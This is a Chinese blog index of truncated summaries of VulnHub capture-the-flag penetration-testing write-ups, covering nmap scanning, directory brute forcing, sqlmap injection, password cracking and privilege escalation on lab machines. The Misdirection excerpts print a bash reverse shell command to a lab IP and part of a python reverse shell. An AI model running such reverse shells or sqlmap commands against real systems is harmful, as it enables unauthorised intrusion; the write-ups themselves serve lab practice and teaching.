合集-综合渗透_VulnHub集合
摘要:CewlKid(VulnHub) 目录CewlKid(VulnHub)1、前期信息收集nmap扫描①存活主机②端口扫描、操作系统③漏洞探测④tcp、udp扫描gobuster目录爆破dirb目录爆破2、Web渗透部分思路一:Sitemagic CMS漏洞库查询思路二:常规web渗透手法①信息收集②密
阅读全文
摘要:这是一个精简版的靶场通关教程,仅供记录使用。 渗透步骤信息收集 1.存活主机发现 ⒉端口扫描 3.FTP服务器渗透 4.分析目标文件 web渗透 1.目录爆破 ⒉尝试安装漏洞 3.识别cms搜索漏洞 4.文件包含漏洞读取任意文件 5.john破解密码文件
阅读全文
摘要:IMF_1(VulbHub)_WriteUp 目录IMF_1(VulbHub)_WriteUp1、主机探测2、web渗透发现flag1发现flag2拼接imfadministrator目录收集用户名代码审计之弱类型绕过发现flag3进入IMF CMS漏扫测试尝试跑sqlmap发现异常数据发现flag
阅读全文
摘要:Misdirection nmap扫描 目录爆破 80小探索 searchsploit 无果 8080端口渗透 反弹shell bash -i >& /dev/tcp/192.168.2.228/11111 0>&1 python -c 'import socket,subprocess,os;s=
阅读全文
摘要:LordOfTheRoot_1.0.1_Writeup 目录LordOfTheRoot_1.0.1_Writeup1、主机存活探测2、尝试仅仅开放了22端口3、由提升进行端口碰撞4、敲震三次后进行全端口扫描5、信息枚举不摸所F12调试界面跑目录跑不出来,只能手测base双重解码后发现新东西6、发现目
阅读全文
摘要:hackable II(VulnHub) 1 2 3 4 5 6 7 8 9 10 11 12 13 14
阅读全文
摘要:DC1(VulnHub) 1 2 3 4、flag1提示 flag1提示:Every good CMS needs a config file - and so do you. 5、flag2提示 flag2提示:Brute force and dictionary attacks aren't t
阅读全文
摘要:Prime 1、nmap 2、web渗透 随便看看 首页隐写查看 目录爆破 gobuster feroxbuster dirsearch dirb 只有dirb扫出来 whatweb searchsploit WordPress 5.2.2 WordPress利用点基本上都是插件或者主题,这里暂时都
阅读全文
摘要:Misdirection(VulnHub) nmap扫描 目录爆破 80小探索 searchsploit 无果 8080端口渗透 反弹shell bash -i >& /dev/tcp/192.168.2.228/11111 0>&1 python -c 'import socket,subproc
阅读全文
摘要:My_file_server_1(VulnHub) 1、nmap 2、目录爆破 gobuster dirb dirsearch 3、文件服务器渗透 PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.2 | ftp-syst: | STAT:
阅读全文
摘要:Fowsniff 1、nmap 2、web渗透 简单浏览 目录爆破 发现可以文件,下载分析 隐写分析 无果,重新浏览80端口 官网浏览 pastebin.com/378rLnGi信息泄露 制作字典 发现爆破均无果 hash识别 john暴力破解hash 发现爆破一次之后,对方会有限制,一段时间后又可
阅读全文
摘要:billub0x 一、nmap 二、web渗透 随便看看 万能密码 没戏 bp抓包导成文件 sqlmap sqlmap -r sql.txt --batch --dbs --random-agent -p "un" sqlmap -r sql.txt --batch --dbs --random-a
阅读全文
摘要:Connect-the-dots 一、nmap cat ports | grep open | awk -F '/' '{print$1}' | paste -sd ',' > nmap_open_port_total.txt 二、ftp渗透 没啥 三、web渗透 随便看看 图片隐写 目录爆破 没错
阅读全文
摘要:Hackademic-RTB1 一、nmap 扫全端口会爆炸,暂时使用默认先扫描出两个 二、web渗透 随便看看 简单目录爆破 /Hackademic_RTB1/ 根据界面提示,我们可以来到这个目录 源码处发现框架 再次目录爆破 wscan扫描 WordPress 1.5.1 searchsploi
阅读全文
摘要:Brainpan 1、nmap 2、web渗透 随便看看 目录爆破 使用不同工具,不同字典进行爆破 9999端口分析 10000端口分析 字符串信息中,提示这个程序不能运行在DOS模式下,然后有32个A,还有一行关于复制字节到缓冲区的信息,还有一行比较奇怪的字符shitstorm,有可能会是密码,接
阅读全文
摘要:Tomato 一、nmap 2211是ssh的端口,21的ftp也不是弱密码 二、web渗透 随便看看 目录爆破 /seclists/Discovery/Web-Content/common.txt /antibot_image/antibots/readme.txt 发现该站点存在反爬机制 /an
阅读全文
摘要:BlackRose 一、nmap 二、web渗透 随便看看 注册进去 账号:xxxxxx 密码:xxxxxx 目录爆破 有很多特殊的目录,不过访问后都重定向了 burpsuite改包进admin 查看xxxxxx用户数据包 抓一些xxxxxx用户的一些记录包,看看有什么可用的 signature=&
阅读全文
摘要:pWnOS_v2.0 一、nmap 靶机ip找不见的自行上网查找解决办法。 二、web渗透 目录爆破 /blog/ whatweb /search.php /register.php qwe 123qwe 点击给定的链接 兔子洞,无法登入?一直卡在这个界面 wfuzz 貌似没什么用 nmap ->
阅读全文
摘要:LAMP SecurityCTF5 一、nmap cat ports | grep open | awk -F '/' '{print $1}' | tr '\n' ',' cat ports | grep open | awk -F '/' '{print $1}' | paste -sd ','
阅读全文